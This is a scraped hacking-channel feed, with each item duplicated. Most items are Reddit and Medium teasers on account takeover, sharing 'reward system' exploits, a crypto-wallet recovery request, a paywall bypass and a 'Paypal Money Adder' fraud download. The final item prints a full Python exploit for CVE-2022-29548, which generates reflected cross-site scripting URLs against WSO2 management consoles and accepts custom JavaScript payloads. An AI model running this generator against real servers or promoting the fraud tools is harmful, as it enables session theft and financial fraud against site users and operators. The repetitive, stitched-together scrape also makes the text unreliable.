MUST HAVE : Skill for Cyber Security Engineer
Are you the one who has passion in Cyber Security engineer ? Lets talk the business, meant i will share the must-have skill you need to…Continue reading on Medium »
Read more...
Are you the one who has passion in Cyber Security engineer ? Lets talk the business, meant i will share the must-have skill you need to…Continue reading on Medium »
Read more...
ITS TIME TO TAKEOVER ACCOUNT
HOW I WAS ABEL TO TAKEOVER ANY USER ACCOUNT USING INVITE FUNCTIONContinue reading on Medium »
Read more...
HOW I WAS ABEL TO TAKEOVER ANY USER ACCOUNT USING INVITE FUNCTIONContinue reading on Medium »
Read more...
Hello World, I created a new sub dedicated to sharing exploits to reward systems.
https://www.reddit.com/r/Pentesting/comments/vlzzq6/hello_world_i_created_a_new_sub_dedicated_to/
submitted by /u/Ganja2233 (https://www.reddit.com/user/Ganja2233)
[link] (https://www.reddit.com/r/RewardExploit?utm_medium=android_app&utm_source=share) [comments] (https://www.reddit.com/r/Pentesting/comments/vlzzq6/hello_world_i_created_a_new_sub_dedicated_to/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/vlzzq6/hello_world_i_created_a_new_sub_dedicated_to/
submitted by /u/Ganja2233 (https://www.reddit.com/user/Ganja2233)
[link] (https://www.reddit.com/r/RewardExploit?utm_medium=android_app&utm_source=share) [comments] (https://www.reddit.com/r/Pentesting/comments/vlzzq6/hello_world_i_created_a_new_sub_dedicated_to/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hello World, I created a new sub dedicated to sharing exploits to...
Posted in r/Pentesting by u/Ganja2233 • 2 points and 0 comments
hacking: security in practice
The Chance of your life !
Hard Times call for extraordinary methods. A friend of mine got robbed on his crypto wallet. He got ambushed by his former co worker that knew he had acquired some currency and went for him with 4 people threaten to harm him and his family.. sad reality the police won’t do nothing because they are to stupid and incompetent to recognise all the transactions and the evidence… poor guy lost everything and has given up because the authorities won’t help him. So, if you want to do something good in this cold world dm me. Disclaimer: I do not want you to hack into his wallet or do other illegal things. If you think you can help him dm me and we discuss everything more detailed!
submitted by /u/legia56
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
The Chance of your life !
Hard Times call for extraordinary methods. A friend of mine got robbed on his crypto wallet. He got ambushed by his former co worker that knew he had acquired some currency and went for him with 4 people threaten to harm him and his family.. sad reality the police won’t do nothing because they are to stupid and incompetent to recognise all the transactions and the evidence… poor guy lost everything and has given up because the authorities won’t help him. So, if you want to do something good in this cold world dm me. Disclaimer: I do not want you to hack into his wallet or do other illegal things. If you think you can help him dm me and we discuss everything more detailed!
submitted by /u/legia56
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
The Chance of your life !
Hard Times call for extraordinary methods. A friend of mine got robbed on his crypto wallet. He got ambushed by his former co worker that knew he...
hacking: security in practice
Script for automated login?
I wonder if I can build a simple script where it opens lets say "randomwebsite.com" but automatically enters login username and password without the need for me to type them (they will be provided in the script).
I don't want them saved in a browser, but just to fill the fields automatic upon running the script?
Is there a way to do that with bash or else?
submitted by /u/Warframe_Immortal
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Script for automated login?
I wonder if I can build a simple script where it opens lets say "randomwebsite.com" but automatically enters login username and password without the need for me to type them (they will be provided in the script).
I don't want them saved in a browser, but just to fill the fields automatic upon running the script?
Is there a way to do that with bash or else?
submitted by /u/Warframe_Immortal
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Script for automated login?
I wonder if I can build a simple script where it opens lets say "randomwebsite.com" but automatically enters login username and password without...
hacking: security in practice
Giving away 2 Tryhackme 1 month vouchers
Comment a reason you are in need of it
Random 2 will win it
Post redemption, winners also have to provide a screenshots as a proof in comments .
Any mod or i can choose the winners
it ends in 24 hours
submitted by /u/irankai
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Giving away 2 Tryhackme 1 month vouchers
Comment a reason you are in need of it
Random 2 will win it
Post redemption, winners also have to provide a screenshots as a proof in comments .
Any mod or i can choose the winners
it ends in 24 hours
submitted by /u/irankai
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Giving away 2 Tryhackme 1 month vouchers
Comment a reason you are in need of it Random 2 will win it Post redemption, winners also have to provide a screenshots as a proof in comments...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Bloodhound Resources
https://cdn-images-1.medium.com/max/1000/1*E0I-QO-1U8yROC6FbUyHGA.png
Awesome Bloodhound
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Bloodhound Resources
https://cdn-images-1.medium.com/max/1000/1*E0I-QO-1U8yROC6FbUyHGA.png
Awesome Bloodhound
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bloodhound Resources
Awesome Bloodhound
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
5 Ways You Can Prevent Being Hacked
https://cdn-images-1.medium.com/max/800/1*kwkg1e9YGfzGN1QHymbiiQ.jpeg
Hacks do happen, even big corporations like Facebook have been hacked. Hacks ruin lives and destroy businesses. We live in a digitised…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
5 Ways You Can Prevent Being Hacked
https://cdn-images-1.medium.com/max/800/1*kwkg1e9YGfzGN1QHymbiiQ.jpeg
Hacks do happen, even big corporations like Facebook have been hacked. Hacks ruin lives and destroy businesses. We live in a digitised…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
5 Ways You Can Prevent Being Hacked
Hacks do happen, even big corporations like Facebook have been hacked. Hacks ruin lives and destroy businesses. We live in a digitised…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
IW Weekly #3: SQL Injection, Data Exfiltration, Log Poisoning, Blind XSS, and more.
https://cdn-images-1.medium.com/max/2000/1*E7acEUZiyRqtvuuemAEqdw.jpeg
Hey 👋
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
IW Weekly #3: SQL Injection, Data Exfiltration, Log Poisoning, Blind XSS, and more.
https://cdn-images-1.medium.com/max/2000/1*E7acEUZiyRqtvuuemAEqdw.jpeg
Hey 👋
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
Medium
IW Weekly #3: SQL Injection, Data Exfiltration, Log Poisoning, Blind XSS, and more.
Hey 👋
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Paypal Money Adder 2022 V3 Free Download
https://cdn-images-1.medium.com/max/900/1*Apf7mLVhLP0LwFVDcR2YwA.jpeg
Paypal Money Adder 2022 V3
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Paypal Money Adder 2022 V3 Free Download
https://cdn-images-1.medium.com/max/900/1*Apf7mLVhLP0LwFVDcR2YwA.jpeg
Paypal Money Adder 2022 V3
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Paypal Money Adder 2022 V3 Free Download
Paypal Money Adder 2022 V3
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What is Kerberos?
https://cdn-images-1.medium.com/max/600/1*DlLNlSF4YT0HsYpFu4k7bg.png
HI guys! I’m back with a new blog and this time to talk about Kerberos, I’m doing this to learn more about Active Directory hacking and…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
What is Kerberos?
https://cdn-images-1.medium.com/max/600/1*DlLNlSF4YT0HsYpFu4k7bg.png
HI guys! I’m back with a new blog and this time to talk about Kerberos, I’m doing this to learn more about Active Directory hacking and…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is Kerberos?
HI guys! I’m back with a new blog and this time to talk about Kerberos, I’m doing this to learn more about Active Directory hacking and…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Spatial.io Platforms Bypass commercial features (Pro paid version)
https://cdn-images-1.medium.com/max/1920/1*T7T6bm_XNmFq6g9IRkZapA.png
Overview
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Spatial.io Platforms Bypass commercial features (Pro paid version)
https://cdn-images-1.medium.com/max/1920/1*T7T6bm_XNmFq6g9IRkZapA.png
Overview
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Spatial.io Platforms Bypass commercial features (Pro paid version)
Overview
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WSO2 Management Console Cross Site Scripting
https://2.bp.blogspot.com/-S-N0q2XL8x8/WWlu5FDj1eI/AAAAAAAAIJA/vGskVQb_QegQZ0-UZMHSDeFJ08ju6pdGQCLcBGAs/s1600/h104.png
WSO2 Management Console suffers from a cross site scripting vulnerability. Many different product versions are affected.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WSO2 Management Console Cross Site Scripting
https://2.bp.blogspot.com/-S-N0q2XL8x8/WWlu5FDj1eI/AAAAAAAAIJA/vGskVQb_QegQZ0-UZMHSDeFJ08ju6pdGQCLcBGAs/s1600/h104.png
WSO2 Management Console suffers from a cross site scripting vulnerability. Many different product versions are affected.
SHA-256 |
209bab2c58dfce94eee51b7eb0b2675f337036396419fe6c59da3c84e1861a31Download
# Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)
# Date: 21 Apr 2022
# Exploit Author: cxosmo
# Vendor Homepage: https://wso2.com
# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/)
# Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;
# API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;
# API Microgateway 2.2.0;
# Data Analytics Server 3.2.0;
# Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;
# IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;
# Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;
# Identity Server Analytics 5.5.0 and 5.6.0;
# WSO2 Micro Integrator 1.0.0.
# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)
# CVE: CVE-2022-29548
import argparse
import logging
import urllib.parse
# Global variables
VULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="
DEFAULT_PAYLOAD = "alert(document.domain)"
# Logging config
logging.basicConfig(level=logging.INFO, format="")
log = logging.getLogger()
def generate_payload(url, custom_payload=False):
log.info(f"Generating payload for {url}...")
if custom_payload:
log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")
else:
log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")
def clean_url_input(url):
if url.count("/") > 2:
return f"{url.split('/')[0]}//{url.split('/')[2]}"
else:
return url
def check_payload(payload):
encoded_characters = ['"', '<',']
if any(character in payload for character in encoded_characters):
log.info(f"Unsupported character(s) (\", <,) found in payload.")
return False
else:
return urllib.parse.quote(payload)
if __name__ == "__main__":
# Parse command line
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
required_arguments = parser.add_argument_group('required arguments')
required_arguments.add_argument("-t", "--target",
help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",
required="True", action="store")
parser.add_argument("-p", "--payload",
help="Use custom JavaScript for generated payload (Some characters (\") are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",
action="store", default=False)
args = parser.parse_args()
# Clean user target input
args.target = clean_url_input(args.target.lower())
# Check for unsupported characters in custom payload; URL-encode as required
if args.payload:
args.payload = check_payload(args.payload)
if args.payload:
generate_payload(args.target, args.payload)
else:
generate_payload(args.target)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WSO2 Management Console Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.